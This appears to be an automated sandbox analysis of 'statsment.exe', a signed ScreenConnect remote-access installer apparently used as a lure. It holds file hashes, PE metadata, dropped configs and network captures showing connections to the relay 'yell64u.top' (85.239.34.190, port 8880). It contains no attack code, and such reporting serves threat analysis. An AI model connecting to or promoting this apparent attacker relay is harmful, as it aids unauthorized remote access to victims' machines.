                                                                    Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):556
                                                                    Entropy (8bit):5.040261494590824
                                                                    Encrypted:false
                                                                    SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUikv3a/vXbAa3xT:2dL9hK6E46YP6JvH
                                                                    MD5:F0E587BEE68CD5E58BE5B761EC5DAF1E
                                                                    SHA1:1FEB20282705BBD13DC61BAC088319C8FAB7E206
                                                                    SHA-256:3551A3A3424288DB55CBF98E12E5A06ABCAE07DECFA79B107192817C113BFF83
                                                                    SHA-512:96284D449251B221ADB6B3E1695E52F21331A8061FE504EFC00E140A701B74CE89CB88B60BE744647BD40401B44E8E98A13772215E908FD58D99F8AE940320F0
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-13%2f12%2f2024%2002%3a13%3a06</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):556
                                                                    Entropy (8bit):5.040261494590824
                                                                    Encrypted:false
                                                                    SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUikv3a/vXbAa3xT:2dL9hK6E46YP6JvH
                                                                    MD5:F0E587BEE68CD5E58BE5B761EC5DAF1E
                                                                    SHA1:1FEB20282705BBD13DC61BAC088319C8FAB7E206
                                                                    SHA-256:3551A3A3424288DB55CBF98E12E5A06ABCAE07DECFA79B107192817C113BFF83
                                                                    SHA-512:96284D449251B221ADB6B3E1695E52F21331A8061FE504EFC00E140A701B74CE89CB88B60BE744647BD40401B44E8E98A13772215E908FD58D99F8AE940320F0
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-13%2f12%2f2024%2002%3a13%3a06</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1590
                                                                    Entropy (8bit):5.363907225770245
                                                                    Encrypted:false
                                                                    SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                    MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                    SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                    SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                    SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.4184325623730678
                                                                    Encrypted:false
                                                                    SSDEEP:48:y4bu7M+xFX4NT5hUM9ptcqcq56AduNSiA9EdZq+ommXrz4ao8rmAduNSID:Db6OTX5ppYfaEdwLmm34D
                                                                    MD5:D1EBAFC2C24D7C07F864887B431383E2
                                                                    SHA1:937D62E399A004EE4399FAD792BC1BE6863AE87E
                                                                    SHA-256:CCFABDA3A7755623AD056B8673710DA4882470EFA6A5EA8B5847B42425C52B88
                                                                    SHA-512:A8CC4309DD4D9147AA15F4FF25B21680EDB21094CF4DEAB35704E7C87EFAF20E8ACA043AB65E84646E03047635ADDD6FAFC43991AAD09968C13037E9C5A8F48B
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.4184325623730678
                                                                    Encrypted:false
                                                                    SSDEEP:48:y4bu7M+xFX4NT5hUM9ptcqcq56AduNSiA9EdZq+ommXrz4ao8rmAduNSID:Db6OTX5ppYfaEdwLmm34D
                                                                    MD5:D1EBAFC2C24D7C07F864887B431383E2
                                                                    SHA1:937D62E399A004EE4399FAD792BC1BE6863AE87E
                                                                    SHA-256:CCFABDA3A7755623AD056B8673710DA4882470EFA6A5EA8B5847B42425C52B88
                                                                    SHA-512:A8CC4309DD4D9147AA15F4FF25B21680EDB21094CF4DEAB35704E7C87EFAF20E8ACA043AB65E84646E03047635ADDD6FAFC43991AAD09968C13037E9C5A8F48B
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):69632
                                                                    Entropy (8bit):0.23294667264205554
                                                                    Encrypted:false
                                                                    SSDEEP:48:mDBAduNS3qcq56AduNSiA9EdZq+ommXrz4ao8rbx9p:AxpYfaEdwLmm34w
                                                                    MD5:AAAEE32F3E4DD00590171E4796903B45
                                                                    SHA1:123E957C848A93238841B1B073F0BADD1293B89F
                                                                    SHA-256:3332AEC52F681E226197FE453BFA469EC00A8A354A9ACB99F9446C59771B06BF
                                                                    SHA-512:483A568D48C410DEC4B7C2B321BB13D3C1E05696D79879222C96DA72B43F4CECA797CAAE3706314CD7C19EE531499AF8458EEBEFFC8BAE0D8018BF8F4F6E088F
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.4184325623730678
                                                                    Encrypted:false
                                                                    SSDEEP:48:y4bu7M+xFX4NT5hUM9ptcqcq56AduNSiA9EdZq+ommXrz4ao8rmAduNSID:Db6OTX5ppYfaEdwLmm34D
                                                                    MD5:D1EBAFC2C24D7C07F864887B431383E2
                                                                    SHA1:937D62E399A004EE4399FAD792BC1BE6863AE87E
                                                                    SHA-256:CCFABDA3A7755623AD056B8673710DA4882470EFA6A5EA8B5847B42425C52B88
                                                                    SHA-512:A8CC4309DD4D9147AA15F4FF25B21680EDB21094CF4DEAB35704E7C87EFAF20E8ACA043AB65E84646E03047635ADDD6FAFC43991AAD09968C13037E9C5A8F48B
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):0.0689519108823031
                                                                    Encrypted:false
                                                                    SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO9Oh+TR0yVky6l3X:2F0i8n0itFzDHF8+lm3X
                                                                    MD5:E5BA7F7179A11BAB0C962E9FCBAB5A1F
                                                                    SHA1:D43F42006301207736B2428D5B541FC6C5E0D9B1
                                                                    SHA-256:6F3ADCDC23CB8E53DDBBAF1A17E143074896D3A6CE89A837DB459AFF77DBAED7
                                                                    SHA-512:03660368587B7AE051835535C2188939C1866707F786B63EEE0BDBE13A8DE71F203B687D9A50CA8E92EFDB16B0873F859D39C714BB1482D8B7747613C7635499
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.7964183569782501
                                                                    Encrypted:false
                                                                    SSDEEP:48:I8PhDuRc06WX4unT5v9ptcqcq56AduNSiA9EdZq+ommXrz4ao8rmAduNSID:XhD1enTHppYfaEdwLmm34D
                                                                    MD5:5B8A65C0D429AA7ED5920066362E617B
                                                                    SHA1:6BABEEBFFA878BDBE934FB6214FA1B9E28845A1A
                                                                    SHA-256:C4F8E8799093B8B1FE276C988161422295B1E7E76CA49B6B05C10D49E7EBB0D9
                                                                    SHA-512:2FF13882D99608AD5B3CC97255F87377A80B4C030D7A8EB80A5219A51D4FE619B01E671529B717313F07324D89C43C4A1699DF1E1098507832EB5C7ABF3E1CF2
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.7964183569782501
                                                                    Encrypted:false
                                                                    SSDEEP:48:I8PhDuRc06WX4unT5v9ptcqcq56AduNSiA9EdZq+ommXrz4ao8rmAduNSID:XhD1enTHppYfaEdwLmm34D
                                                                    MD5:5B8A65C0D429AA7ED5920066362E617B
                                                                    SHA1:6BABEEBFFA878BDBE934FB6214FA1B9E28845A1A
                                                                    SHA-256:C4F8E8799093B8B1FE276C988161422295B1E7E76CA49B6B05C10D49E7EBB0D9
                                                                    SHA-512:2FF13882D99608AD5B3CC97255F87377A80B4C030D7A8EB80A5219A51D4FE619B01E671529B717313F07324D89C43C4A1699DF1E1098507832EB5C7ABF3E1CF2
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.4294828876487875
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:statsment.exe
                                                                    File size:5'652'448 bytes
                                                                    MD5:321132051c3add66f0cdae4b8cf4c332
                                                                    SHA1:8513ae78b78f157fdd8800f2eda654c75332cd4b
                                                                    SHA256:d19dbc6b0c0792df8f420c14ef25130052a81d481d38340a40194862ff0095cd
                                                                    SHA512:5c47b794ea1f3e277883159d652b77e8da2dccdbb890ede18d3eb7b3db960d0848f770ea13dcbbe26bc4a61baf6559921dec3531d23d390e19982d5726541fcc
                                                                    SSDEEP:49152:IDex5xKkEJkGYYpT0+TFiH7efP0x58IJL+md3rHgDNMKLo8SsxG/XcW32gqkAfoc:c4s6efPQ53JLbd3LINMLaGUW39f0
                                                                    TLSH:D046E111B3D995B9C0BF063CD87A52699A74BC048722C7AF57D4BD292D32BC05E323B6
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                    Icon Hash:90cececece8e8eb0
                                                                    Entrypoint:0x4014ad
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                    Signature Valid:true
                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                    Signature Validation Error:The operation completed successfully
                                                                    Error Number:0
                                                                    Not Before, Not After
                                                                    • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                    Subject Chain
                                                                    • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                    Version:3
                                                                    Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                    Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                    Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                    Serial:0B9360051BCCF66642998998D5BA97CE
                                                                    Instruction
                                                                    call 00007F13C47003AAh
                                                                    jmp 00007F13C46FFE5Fh
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push 00000000h
                                                                    call dword ptr [0040D040h]
                                                                    push dword ptr [ebp+08h]
                                                                    call dword ptr [0040D03Ch]
                                                                    push C0000409h
                                                                    call dword ptr [0040D044h]
                                                                    push eax
                                                                    call dword ptr [0040D048h]
                                                                    pop ebp
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 00000324h
                                                                    push 00000017h
                                                                    call dword ptr [0040D04Ch]
                                                                    test eax, eax
                                                                    je 00007F13C46FFFE7h
                                                                    push 00000002h
                                                                    pop ecx
                                                                    int 29h
                                                                    mov dword ptr [004148D8h], eax
                                                                    mov dword ptr [004148D4h], ecx
                                                                    mov dword ptr [004148D0h], edx
                                                                    mov dword ptr [004148CCh], ebx
                                                                    mov dword ptr [004148C8h], esi
                                                                    mov dword ptr [004148C4h], edi
                                                                    mov word ptr [004148F0h], ss
                                                                    mov word ptr [004148E4h], cs
                                                                    mov word ptr [004148C0h], ds
                                                                    mov word ptr [004148BCh], es
                                                                    mov word ptr [004148B8h], fs
                                                                    mov word ptr [004148B4h], gs
                                                                    pushfd
                                                                    pop dword ptr [004148E8h]
                                                                    mov eax, dword ptr [ebp+00h]
                                                                    mov dword ptr [004148DCh], eax
                                                                    mov eax, dword ptr [ebp+04h]
                                                                    mov dword ptr [004148E0h], eax
                                                                    lea eax, dword ptr [ebp+08h]
                                                                    mov dword ptr [004148ECh], eax
                                                                    mov eax, dword ptr [ebp-00000324h]
                                                                    mov dword ptr [00414828h], 00010001h
                                                                    Programming Language:
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 build 21022
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533080.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x1dde0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x160000x5330800x5332000cb59c276652808eb7200fdad38bae5bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    FILES0x163d80x86000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.39622565881529853
                                                                    FILES0x9c3d80x1a4600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5111637115478516
                                                                    FILES0x2409d80x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.4415614047897196
                                                                    FILES0x25b5d80x2ec320PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9812068939208984
                                                                    FILES0x5478f80x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                    RT_MANIFEST0x548ef80x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                    DLLImport
                                                                    mscoree.dllCorBindToRuntimeEx
                                                                    KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                    OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 13, 2024 03:13:07.754048109 CET497318880192.168.2.485.239.34.190
                                                                    Dec 13, 2024 03:13:07.874087095 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:07.874350071 CET497318880192.168.2.485.239.34.190
                                                                    Dec 13, 2024 03:13:09.062190056 CET497318880192.168.2.485.239.34.190
                                                                    Dec 13, 2024 03:13:09.182313919 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:09.504359007 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:09.531126976 CET497318880192.168.2.485.239.34.190
                                                                    Dec 13, 2024 03:13:09.651571035 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:09.986951113 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:10.117400885 CET497318880192.168.2.485.239.34.190
                                                                    Dec 13, 2024 03:13:10.179455996 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:10.304835081 CET497318880192.168.2.485.239.34.190
                                                                    Dec 13, 2024 03:13:11.003588915 CET497318880192.168.2.485.239.34.190
                                                                    Dec 13, 2024 03:13:11.003590107 CET497318880192.168.2.485.239.34.190
                                                                    Dec 13, 2024 03:13:11.123773098 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:11.123800993 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:11.123908997 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:11.123925924 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:11.123976946 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:11.123994112 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:12.003371000 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:13:12.170116901 CET497318880192.168.2.485.239.34.190
                                                                    Dec 13, 2024 03:14:12.008240938 CET497318880192.168.2.485.239.34.190
                                                                    Dec 13, 2024 03:14:12.128350973 CET88804973185.239.34.190192.168.2.4
                                                                    Dec 13, 2024 03:15:12.132924080 CET497318880192.168.2.485.239.34.190
                                                                    Dec 13, 2024 03:15:12.253220081 CET88804973185.239.34.190192.168.2.4
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 13, 2024 03:13:07.162753105 CET5920453192.168.2.41.1.1.1
                                                                    Dec 13, 2024 03:13:07.704803944 CET53592041.1.1.1192.168.2.4
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 13, 2024 03:13:07.162753105 CET192.168.2.41.1.1.10xd719Standard query (0)yell64u.topA (IP address)IN (0x0001)false
